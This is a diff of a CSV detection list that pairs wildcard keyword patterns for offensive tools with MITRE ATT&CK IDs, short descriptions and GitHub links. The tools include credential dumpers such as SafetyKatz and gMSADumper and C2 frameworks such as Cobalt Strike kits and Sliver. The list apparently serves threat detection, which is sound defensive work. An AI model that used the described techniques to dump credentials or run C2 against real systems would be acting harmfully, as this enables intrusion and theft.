TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet on*","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","0","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" "*GhostInTheNet.sh *","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","N/A","7","4","359","85","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z" @@ -10872,28 +11023,28 @@ "*GhostPack/ForgeCert*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*GhostPack/Koh*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*GhostPack/SafetyKatz*","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1101","244","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" -"*GhostPack/Seatbelt*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*GhostPack/SharpDPAPI*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*Ghostpack-CompiledBinaries*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","855","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" -"*GhostWebShell.cs*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*GhostPack/Seatbelt*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*GhostPack/SharpDPAPI*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*Ghostpack-CompiledBinaries*","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","9","857","177","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" +"*GhostWebShell.cs*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "*gimmecredz*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*ginuerzh/gost*","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","10","13872","2298","2023-09-21T04:01:17Z","2015-03-20T09:45:08Z" "*Gioyik/getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*git log -p | scanrepo *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*github*/COMHunter/*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*github*/COMHunter/*","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*github*/DeathStar*","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","10","1529","339","2022-12-08T07:44:30Z","2017-05-21T07:34:57Z" -"*github*/MoveKit.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*github*/MoveKit.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*github*/Mr-xn/*","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*github*/padre.git*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" -"*github.com/*Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*github.com/*Reaper.exe*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*github.com/Arno0x*","offensive_tool_keyword","Github Username","Github username known for exploitation toos and scripts","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Arno0x","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/BishopFox*","offensive_tool_keyword","Github Username","Private professional services firm providing offensive security testing to the Fortune 500. serving exploitation tools on github","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/BishopFox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*github.com/bishopfox/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*github.com/bishopfox/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*github.com/dafthack*","offensive_tool_keyword","Github Username","Github user hosting exploitation tools for pentest and redteam","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*github.com/g3tsyst3m*","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*github.com/g3tsyst3m*","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*github.com/GoSecure*","offensive_tool_keyword","Github Username","github repo name containing multiple exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/GoSecure","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/k8gege*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"*github.com/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*github.com/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*github.com/nccgroup*","offensive_tool_keyword","Github Username","github repo name hosting securty tools and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/nccgroup","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/quickbreach*","offensive_tool_keyword","Github Username","An infosec security researcher & penetration tester. hosting offensive tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/rasta-mouse/*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" @@ -10902,12 +11053,12 @@ "*github.io/weakpass/generator/*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*GithubC2-main*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*gitleaks detect*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*gitleaks*","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","13893","1249","2023-10-03T15:38:08Z","2018-01-27T18:19:31Z" +"*gitleaks*","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","13901","1250","2023-10-03T15:38:08Z","2018-01-27T18:19:31Z" "*Git-Scanner*","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Information Gathering","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","4","303","82","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z" -"*GIUDA* -askluids*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" -"*GIUDA-main.zip*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*GIUDA* -askluids*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*GIUDA-main.zip*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*give_dcsync.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"*glassfish_war_upload_xsrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*glassfish_war_upload_xsrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*glebarez/padre*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*glit org -*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" "*glit repo *","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" @@ -10923,38 +11074,38 @@ "*gloxec/CrossC2*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*gloxec/CrossC2*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*GmailC2.csproj*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" -"*gmsa_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*gmsa_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*gMSADumper.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*gMSADumper.py*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" "*GMSAPasswordReader.exe*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" "*GMSAPasswordReader-master*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" -"*GMShellcode*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*GMShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential 